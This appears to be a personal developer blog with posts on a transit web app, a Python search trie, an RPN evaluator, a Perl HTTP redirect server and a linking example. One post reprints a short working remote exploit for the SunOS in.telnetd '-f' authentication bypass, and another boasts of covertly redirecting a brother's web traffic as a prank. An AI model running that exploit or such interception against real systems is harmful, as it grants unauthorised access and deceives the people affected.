29 03/11
13:08

Local public transportation in my pocket

I’ve lately spent some time developing a web app for mobile devices that works with some of the data published by the Gijón City Council: specifically, the schedules and live arrival times of local public transport. The way that information is currently presented to mobile devices is very heavy and slow, so I thought it might be useful to build something simpler for personal use.

Basically, it is a simple web service that caches data aggressively (to avoid stressing the data origin with many requests) plus an AJAX-powered frontend with CSS designed for mobile browsers (it works flawlessly on Android’s browser and Mobile Safari). Additionally, if you add it as a bookmark to your iPhone’s home screen, it behaves like a native application (you know, splash screen, custom icon, taskbar and so on).
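
To give an idea of what that kind of server-side caching can look like, here is a minimal sketch of a time-based cache in Python. It is not the code behind the web app: the TTLCache class, its parameters and the 30-second default are all assumptions made up for illustration.

```python
import time


class TTLCache:
    """Caches fetched values for a fixed number of seconds (hypothetical helper)."""

    def __init__(self, fetch, ttl_seconds=30.0, clock=time.monotonic):
        self._fetch = fetch          # callable that hits the slow data origin
        self._ttl = ttl_seconds      # how long an entry stays fresh
        self._clock = clock          # injectable clock, handy for testing
        self._entries = {}           # key -> (expiry_time, value)

    def get(self, key):
        now = self._clock()
        entry = self._entries.get(key)
        if entry is not None and entry[0] > now:
            return entry[1]          # still fresh: no request to the origin
        value = self._fetch(key)     # missing or stale: ask the origin once
        self._entries[key] = (now + self._ttl, value)
        return value
```

Every request for the same key within the time window is answered from memory, so the data origin sees at most one request per key per window.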

I’m now working on client-side caching using HTML5 caching for offline usage. This way the application will boot way faster. It’s almost done, but it still needs some debugging.

I don’t intend to make it public for now. However, if you find it useful feel free to drop me a line. Beta testers are always welcome (but unfortunately won’t be rewarded).

This is how it looks at the moment. The source will be released soon.

Update (23:26): Android screenshots provided by Javier Pozueco. Thanks buddy!

24 03/11
12:31

Search term completion using a search tree

[Image: Google search box completion]

Nowadays it’s very common to find websites offering hints while you’re typing in a search box. Google is a pretty good example. But how could it be implemented?

This feature could be implemented either on the client side or on the server side. If the word list is big (it usually is), it’s better to keep the lookup logic on the server: the page sent to the client stays smaller, and server-side caches save computing power (handy when you plan to serve many requests).

Either way, there should be a data structure somewhere containing the word list and an algorithm to do the lookup. The simplest approach may be to use a list to store the words and issue something like this when you want to get a list of hints for a given prefix:

filter(lambda x: x.startswith(prefix), word_list)

That’s Python’s filter, and it works the same way as Haskell’s well-known higher-order function filter. It builds a new list with the elements of the original list (word_list) that match the predicate (the lambda function). In Python 3, filter returns a lazy iterator instead, so wrap it in list() to get a list.

Although the results can (and should) be cached, the very first lookup (and every lookup after the cache expires) is inefficient because the entire list must be traversed, which takes linear time. Not bad, but as the problem grows (i.e. more and more words in the database) the lookup may become too slow, especially if you’re serving several users at the same time. If the list were sorted, the execution time could be improved with a more sophisticated algorithm such as binary search, but let’s keep it that way for now.
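
For the curious, the sorted-list idea could be sketched with Python’s bisect module. This is only an illustration under the assumption that the list is already sorted; the function name hints_from_sorted is made up, and it is not the approach benchmarked in this post.

```python
import bisect


def hints_from_sorted(sorted_words, prefix):
    """Returns the words in 'sorted_words' that start with 'prefix'.

    Assumes 'sorted_words' is already sorted (e.g. with sorted()).
    """
    # Binary search for the first word that is >= prefix.
    start = bisect.bisect_left(sorted_words, prefix)
    end = start
    # Words sharing the prefix are contiguous in a sorted list.
    while end < len(sorted_words) and sorted_words[end].startswith(prefix):
        end += 1
    return sorted_words[start:end]


words = sorted(["nacho", "nachos", "nachete", "house", "housing", "hot"])
print(hints_from_sorted(words, "hous"))
```

Finding the start of the run takes logarithmic time, and the loop afterwards only touches the words that are actually returned.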

Fortunately, there are better and faster ways to tackle the problem. If you don’t want to write code (usually the best choice) you may use a high-performance indexing engine such as Apache Lucene. But if you prefer the ‘do-it-yourself’ way (for learning purposes), a search tree (more specifically, a trie or prefix tree) is a good approach.

I’ve roughly benchmarked both alternatives (the list and the tree) and, as expected, the tree is considerably quicker at generating hints. What I did was feed both data structures with the contents of an American English word list holding ~640k words (Debian package wamerican-insane).

So, assuming four is a reasonable minimum prefix length, I measured the time it would take to get a list of words prefixed by hous (yes, just one, remember I said this was a poor benchmark? ;). Unsurprisingly, it took around 230 times longer for the list alternative to generate the hints (438.96 ms vs 1.92 ms). Wow.
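
A measurement like this can be reproduced with something along the lines of the sketch below. It is not the script used for the numbers above: the helper names and the synthetic word list are assumptions, and it only times the plain list scan.

```python
import timeit


def linear_hints(word_list, prefix):
    """Linear scan over the whole list, as in the filter() one-liner."""
    return [w for w in word_list if w.startswith(prefix)]


def average_ms(func, repeat=10):
    """Returns the mean wall-clock time of one call to 'func', in milliseconds."""
    total_seconds = timeit.timeit(func, number=repeat)
    return total_seconds / repeat * 1000.0


# Synthetic stand-in for a real word list (assumption: not the data used above).
words = ["word%06d" % i for i in range(20000)] + ["house", "housing"]

elapsed = average_ms(lambda: linear_hints(words, "hous"))
print("linear scan: %.2f ms per lookup" % elapsed)
```

Timing the tree is a matter of passing a different callable to average_ms, for example one that calls get_hints on a populated tree.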

My implementation of the tree is as follows. The API is quite straightforward; the “hot” methods are put and get_hints. I’ve stripped out the test suite for space reasons.

Usage example:

>>> tree = HintSearchTree()
>>> tree.put("nacho")
>>> tree.put("nachos")
>>> tree.put("nachete")
>>> tree.get_hints("nach")
['nachete', 'nacho', 'nachos']
>>> tree.get_hints("nacho")
['nacho', 'nachos']
>>> tree.delete("nacho")
>>> tree.get_hints("nacho")
['nachos']
>>> tree.count_words()
2
>>> tree.get_hints("n")
['nachete', 'nachos']
>>> tree.is_indexed("nachete")
True
>>> tree.is_indexed("nach")
False
>>> tree.empty()
False

class HintSearchTreeNode(object):
  def __init__(self, parent=None, terminal=False):
    self._children = {}
    self._terminal = terminal
    self._parent = parent
 
  @property
  def children(self):
    return self._children
 
  @property
  def terminal(self):
    return self._terminal
 
  @terminal.setter
  def terminal(self, value):
    self._terminal = value
 
  @property
  def parent(self):
    return self._parent
 
class HintSearchTree(object):
  def __init__(self):
    self._root = HintSearchTreeNode()
 
  def put(self, word):
    """Adds a word to the tree."""
    # TODO: Sanitize 'word'
    if len(word) > 0:
      self._put(self._root, word)
 
  def count_words(self):
    """Retrieves the number of indexed words in the tree."""
    return self._count_words(self._root)
 
  def is_indexed(self, word):
    """Returns True if 'word' is indexed."""
    node = self._find(self._root, word)
    return node is not None and node.terminal is True
 
  def get_hints(self, prefix):
    """Returns a list of words prefixed by 'prefix'."""
    return self._match_prefix(self._root, prefix)
 
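  def delete(self, word):
    """Deletes 'word' (if exists) from the tree."""
    terminal = self._find(self._root, word)
    # Only act on indexed words. This also guards against the empty string,
    # for which _find returns the root (which has no parent to prune from).
    if terminal is not None and terminal.terminal:
      terminal.terminal = False
      self._prune(terminal.parent, word)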
 
  def empty(self):
    """Returns True if the tree contains no elements."""
    return len(self._root.children) == 0
 
  def _put(self, node, word, depth=0):
    next_node = node.children.get(word[depth])
    if next_node is None:
      next_node = HintSearchTreeNode(parent=node)
      node.children[word[depth]] = next_node
    if len(word)-1 == depth:
      next_node.terminal = True
    else:
      self._put(next_node, word, depth+1)
 
  def _count_words(self, node):
    words = 1 if node.terminal is True else 0
    for k in node.children:
      words += self._count_words(node.children[k])
    return words
 
  def _match_prefix(self, node, prefix):
    terminal = self._find(node, prefix)
    if terminal is not None:
      return self._harvest_node(terminal, prefix)
    else:
      return []
 
  def _harvest_node(self, node, prefix, path=""):
    hints = []
    if node.terminal is True:
      hints.append(prefix + path)
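    # Visit children in sorted order so hints come back alphabetically,
    # as in the usage example, regardless of dict ordering.
    for k in sorted(node.children):
      hints.extend(self._harvest_node(node.children[k], prefix, path+k))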
    return hints
 
  def _find(self, node, word, depth=0):
    if depth == len(word):
      return node
    else:
      child = node.children.get(word[depth])
      if child is not None:
        return self._find(child, word, depth+1)
      else:
        return None
 
  def _prune(self, node, word):
    if self._count_words(node.children[word[-1]]) == 0:
      del node.children[word[-1]]
      if len(node.children) == 0 and node.parent is not None \
          and node.terminal is not True:
        self._prune(node.parent, word[:-1])

The code is released in the public domain.

24 02/11
22:55

Some Perl to redirect HTTP requests

After almost a year without publishing a single post, it seems this week I’m going to beat all my records.

A week ago, I wanted to prank my brother for a while. Nothing sophisticated… just some iptables rules, Tinyproxy and HTTP magic. To go ahead with my evil plans, I needed “something” able to redirect an HTTP request. Actually, there are several ways to do that: Apache redirects, Tornado, Netcat* and so on. These alternatives are fast, bulletproof and time-saving, but not fun.

As many of you probably know, I haven’t got a job yet. That necessarily means I’ve got plenty of free time to waste. So… what did I do? I wrote some Perl, and today I’m publishing the source code just in case someone finds it useful. Like the previous entry, it’s released into the public domain.

The script just accepts connections, replies with a 301 (Moved Permanently) and sets Location to the URI given as a command-line argument (option -u). It lacks some security checks (left as an exercise for the reader) but it does what it is supposed to do. You will likely spot some silly bugs, as I haven’t spent much time rereading it. Reports are welcome!

For those wondering, the prank was a big success. I’m afraid I can’t share any details for now, but it turns out my bro still thinks his computer has been cracked.
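
Stripped of threads and logging, the exchange boils down to very little. The following Python sketch is only an illustration of it, not a port of the Perl script: the function names are made up, and the Content-Length header is an extra that the script itself does not send.

```python
def build_redirect_response(location):
    """Builds a minimal raw HTTP 301 response pointing at 'location'."""
    lines = [
        "HTTP/1.1 301 Moved Permanently",
        "Location: %s" % location,
        "Content-Length: 0",  # assumption: not sent by the Perl script
        "Connection: close",
        "",  # the two empty items produce the blank line
        "",  # that terminates the header block
    ]
    return "\r\n".join(lines).encode("ascii")


def serve_once(listening_socket, location):
    """Accepts one client, reads its request headers and replies with the redirect."""
    client, _address = listening_socket.accept()
    try:
        received = b""
        # Read until the blank line that ends the request headers (capped at 8 KiB).
        while b"\r\n\r\n" not in received and len(received) < 8 * 1024:
            chunk = client.recv(1024)
            if not chunk:
                break
            received += chunk
        client.sendall(build_redirect_response(location))
    finally:
        client.close()
```

To try it out, create a listening socket with socket.create_server(("", 7070)) (Python 3.8 or later) and call serve_once in a loop.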

Example invocation:

$ perl redir.pl -p 7070 -v -t 3 -u http://31337.pl
2011/02/24 21:41:54 Listening on port 7070
2011/02/24 21:41:54 Redirecting HTTP requests to: 'http://31337.pl'
2011/02/24 21:41:54 3 thread(s) working under the hood

And finally the source code:

use warnings;
use threads;
 
use Thread::Queue;
use POSIX;
 
use IO::Socket::INET;
use HTTP::Request;
use HTTP::Status qw(:constants status_message);
 
use Getopt::Long;
use DateTime::Format::HTTP;
use Data::Validate::URI qw(is_http_uri);
use Log::Log4perl qw(:easy);
 
use constant MAX_THREADS => 10;
use constant MAX_LEN_HEADERS_BUFFER => 8*1024;
use constant DEFAULT_REDIRECT_URI => "http://www.example.org";
use constant DEFAULT_PORT => 80;
use constant DEFAULT_POOL_SIZE => 3;
 
my $redir_uri = DEFAULT_REDIRECT_URI;
my $server_port = DEFAULT_PORT;
my $thread_pool_size = DEFAULT_POOL_SIZE;
my $verbose;
 
GetOptions('url=s' => \$redir_uri, 
           'port=i' => \$server_port,
           'threads=i' => \$thread_pool_size,
           'verbose'  => \$verbose) or exit -1;
 
die "Invalid redirect URI (e.g. http://www.example.org)\n" unless is_http_uri($redir_uri);
die "Invalid port (e.g. 8080)\n" unless 0 < $server_port && $server_port < 2**16;
die "Invalid pool size (should be in [1..".MAX_THREADS."])\n" 
            unless 0 < $thread_pool_size && $thread_pool_size <= MAX_THREADS;
 
Log::Log4perl->easy_init( level => $verbose? $DEBUG : $INFO );
 
my $pending = Thread::Queue->new(); 
 
my $lsock = IO::Socket::INET->new( LocalPort => $server_port,
                                   Proto => 'tcp',
                                   Listen => 1,
                                   Reuse => 1 ) or die "Couldn't bind listening socket ($!)\n"; 
 
INFO("Listening on port $server_port\n");
INFO("Redirecting HTTP requests to: '$redir_uri'\n");
 
my @workers = ();
for (1..$thread_pool_size) {
    if (my $thread = threads->create("worker")) {
        push(@workers, $thread);
    }
}
 
DEBUG(sprintf("%d thread(s) working under the hood\n", $#workers+1));
 
# Set a tidy shutdown just in case an external agent SIG{INT,TERM}s the process
$SIG{'INT'} = $SIG{'TERM'} = sub {
    # Dirty hack. threads->kill() does not wake up the thread :(
    for (1..@workers) {
        $pending->enqueue(-1);
    }
    for (@workers) {
        DEBUG(sprintf("Worker %d terminated: %d clients served\n", $_->tid, $_->join())); 
    }
    close($lsock); 
    exit 0; 
};
 
while(1) {
    my $csock = $lsock->accept() or next;
    $pending->enqueue(POSIX::dup(fileno $csock));
    DEBUG(sprintf("New client enqueued: %s:%s\n", $csock->peerhost, $csock->peerport));
    close($csock);
}
 
sub worker {
    my $clients_served = 0;
    while(my $fd = $pending->dequeue) { # API promises thread safety :-)
        if ($fd == -1) {
            return $clients_served;
        }
 
        my $sock = IO::Socket::INET->new_from_fd($fd, "r+");
        DEBUG(sprintf("Dequeued client %s:%d by worker %d.\n", $sock->peerhost,
                            $sock->peerport, threads->tid()));
 
        my $buf = "";
        while(<$sock>) {
            # CAUTION: there isn't any self protection against very long lines
            last if /^\r\n$/;
            $buf .= $_;
            goto BYE if length $buf > MAX_LEN_HEADERS_BUFFER;
        }
 
        if (my $request = HTTP::Request->parse($buf)) {
            INFO(sprintf("[%s] %s {%s}\n", $request->method, $request->uri, $sock->peerhost));
        }
 
        printf $sock "HTTP/1.1 %d %s\r\n", 
            HTTP_MOVED_PERMANENTLY, status_message(HTTP_MOVED_PERMANENTLY);
        printf $sock "Date: %s\r\n", DateTime::Format::HTTP->format_datetime;
        print $sock "Location: $redir_uri\r\n";
        print $sock "Server: Simple HTTP Redirection/0.1 ($^O)\r\n";
        print $sock "Connection: close\r\n";
        print $sock "\r\n";
 
BYE:  
        $clients_served++;
        close($sock);
    }
}

(*) just an approach, may drop connections:

while [ 1 ]; 
 do echo -e "HTTP/1.1 301 Moved Permanently\r\nLocation: http://31337.pl\r\n\r\n" | nc -l 7070; 
done

23 02/11
01:03

Reverse Polish Notation Evaluation in Python

This introduction is followed by some Python code (function evaluate_postfix_expr) to evaluate expressions (only integers, but may be extended with ease) in Reverse Polish Notation (RPN). Some simple tests are also included in the bundle.

I admit it’s not terribly practical, but I thought it might be useful for someone (CS students maybe?). If you want to examine the stack in each iteration you only have to turn debugging on. That can be accomplished by changing logging.INFO to logging.DEBUG (line 7, the logging.basicConfig call).

Copy, distribute or do whatever you want with it. It’s released in the public domain.

#!/usr/bin/env python
 
import logging
import re
import unittest
 
logging.basicConfig(level=logging.INFO)
 
# int.__floordiv__ exists on both Python 2 and 3 (int.__div__ is Python 2 only)
operators_table = {'+': int.__add__,
                   '-': int.__sub__,
                   '*': int.__mul__,
                   '/': int.__floordiv__,
                   '^': int.__pow__}
 
class ExpressionError(Exception):
    def __init__(self, message):
        self._message = "Expression error: %s" % message
        # Pass the message on so str(error) is not empty
        super(ExpressionError, self).__init__(self._message)
    def _get_message(self): 
        return self._message
    message = property(_get_message)
 
class TestEvaluation(unittest.TestCase):
    def test_correct(self):
        self.assertEqual(666, evaluate_postfix_expr("666"))
        self.assertEqual(2+3-6, evaluate_postfix_expr("2 3 + 6 -"))
        self.assertEqual(2*3+4, evaluate_postfix_expr("2 3 * 4 +"))
        self.assertEqual(2*(3+4), evaluate_postfix_expr("2 3 4 + *"))
        self.assertEqual(3**4, evaluate_postfix_expr("3   3  *     3  *      3 *"))
        # '/' is integer division, hence // on the Python side
        self.assertEqual((7//2)**4, evaluate_postfix_expr("7 2 / 4 ^"))
        self.assertEqual((2**3)**4, evaluate_postfix_expr("2 3 ^ 4 ^"))
        self.assertEqual(5+((1+2)*4)-3, evaluate_postfix_expr("5 1 2 + 4 * 3 - +"))
 
    def test_malformed(self):
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "+")
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "2 +")
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "+ 2 2")
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "2 2")
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "2 2 + -")
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "a 2 -")
 
def evaluate_postfix_expr(expr):
    atoms = re.split(r"\s+", expr)
    stack = [] 
    for atom in atoms:
        if atom in ["+", "-", "*", "/", "^"]:
            try:
                op2 = stack.pop()
                op1 = stack.pop()
            except IndexError:
                raise ExpressionError("Too few operands (unbalanced)")
            logging.debug("Calculating %d %s %d" % (op1, atom, op2))
            atom = operators_table[atom](op1, op2)
        else:
            try:
                atom = int(atom)
            except ValueError:
                raise ExpressionError("Unable to parse '%s' as integer" % atom)
 
        try:
            stack.append(atom)
        except MemoryError:
            raise ExpressionError("Too long expression")
 
        logging.debug("Pushed element %d. Stack status: %s" % (atom, stack))
 
    if len(stack) == 1:
        return stack.pop()
    else:
        raise ExpressionError("Too many operands (unbalanced)")
 
if __name__ == "__main__":
    unittest.main()
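
As for extending it beyond integers, a float-aware variant could look roughly like the sketch below. It is a standalone illustration, not part of the bundle: the names FLOAT_OPERATORS and evaluate_postfix_floats are made up, it raises plain ValueError instead of ExpressionError, and '/' is true division here.

```python
import operator

# Hypothetical float-aware operator table; '/' is true division here.
FLOAT_OPERATORS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
    "^": operator.pow,
}


def evaluate_postfix_floats(expr):
    """Evaluates an RPN expression whose operands may be integers or decimals."""
    stack = []
    for atom in expr.split():
        if atom in FLOAT_OPERATORS:
            if len(stack) < 2:
                raise ValueError("Too few operands (unbalanced)")
            op2 = stack.pop()
            op1 = stack.pop()
            stack.append(FLOAT_OPERATORS[atom](op1, op2))
        else:
            stack.append(float(atom))  # raises ValueError on bad input
    if len(stack) != 1:
        raise ValueError("Malformed expression (unbalanced)")
    return stack[0]


print(evaluate_postfix_floats("7 2 / 4 ^"))
```

Using expr.split() instead of a regular expression also takes care of leading and trailing whitespace.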

09 05/08
21:38

Yay, you won!

Some people are born winners, and you’re one of them. Congratulations dude! ;)

30 08/07
11:27

Example: How to statically and dynamically link your executables

People usually use Google, among other things, to look for hints about how to do small tasks. Hopefully, you will find the hint you were looking for in somebody’s blog, because he or she had the same problem some time ago and decided to write about it.

Last night I was a bit bored and started writing a dumb set of files to show people how static and dynamic linking work. So, to put in my two cents and add a new hint to the wild wild web, I’m sharing it. The C source files are practically useless, so pay attention to the Makefile; the magic is in there.

If you’re downloading it only to compile it, run it and see what happens, forget about it: the program is completely silly. The Makefile is probably buggy somewhere, so bug reports are welcome. For teaching purposes, try, for example, breaking the ABI and see what happens.

Google, index this post please!

Update: This example does not cover autotools/libtool

11 04/07
12:31

Software engineering, university flavor

I’m going to use my blog to record what, according to quite reliable sources, a Software Engineering professor told his students a few days ago.

Obviously I won’t give the name, the course, the degree or even the university (though I imagine you’ll guess right), since that matters least. I should also warn that the quote is not literal, but I think it will do to get the point across:

I don’t advise you to use SCM systems because they will complicate your lives, you won’t develop well; don’t be technocrats.

I still can’t get over my astonishment that a Software Engineering professor would say that, especially “they will complicate your lives”, when it is precisely the other way round. In my opinion, they are indispensable even for a single person developing alone, and not using one is suicide when the working group has more than two people (as is the case here). And it’s not just me who thinks so: so do Debian, Google, Kernel.org, Lufthansa, NASA, CERN, CSC (any company with a halfway decent team uses one every day!)… and not only large companies, but any group of people trying to develop something together (yes, that company you’re thinking of uses one too).

Honestly, I’m ashamed that things like this are said at university. Keep training engineers like that; there’s a reason we’re still at the tail end of Europe.

And you, are you still passing a .zip around with your classmates?

13 02/07
15:46

SunOS 5.10/5.11 owned, really!

Try it or get more details.


#!/bin/sh
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos HOST ACCOUNT"
echo "e.g.: ./sunos localhost bin"
exit
fi
telnet -l"-f$2" $1

13 11/06
15:56

Share the innovation

This is the shout of the day, probably of the year: Sun opens Java SE, ME and other stuff

20 02/06
10:01

Breaking in the new membership register

Taking advantage of my “friendship” with the dolphin, this weekend I wrote a PHP application from scratch to manage the association’s members more comfortably.

The HTML of the new program validates against the XHTML 1.1 standard and uses the style sheets written by Diego Berrueta and Páblo López for the AsturLiNUX website, for a more pleasant look.

I have already migrated the members’ data to this new manager, but I will extend the trial period a little longer before releasing it (first I’ll have to add more error handling, which wasn’t needed for personal use, or so I think), since it will surely be useful to another association that works in a similar way to ours. The new system will give the Secretary a much friendlier environment for keeping the register, making it easier to automate tasks with macro operations, such as e-mailing the member concerned when a fee payment is confirmed, or sending reminders automatically.
Thanks to Rastreador for his comments on the accessibility of the interface; thanks to him, I’ve managed to make the environment a bit friendlier. I’d show you how it turned out, but I don’t much feel like taking screenshots; maybe another day.

When I release the software I’ll keep you posted.

29 08/05
18:11

MGE UPS Nagios Perl Script

I’ve had to write the odd Nagios plugin for work, and I’m trying to release as much as I can under the GPL license; here is the link in case you ever need it.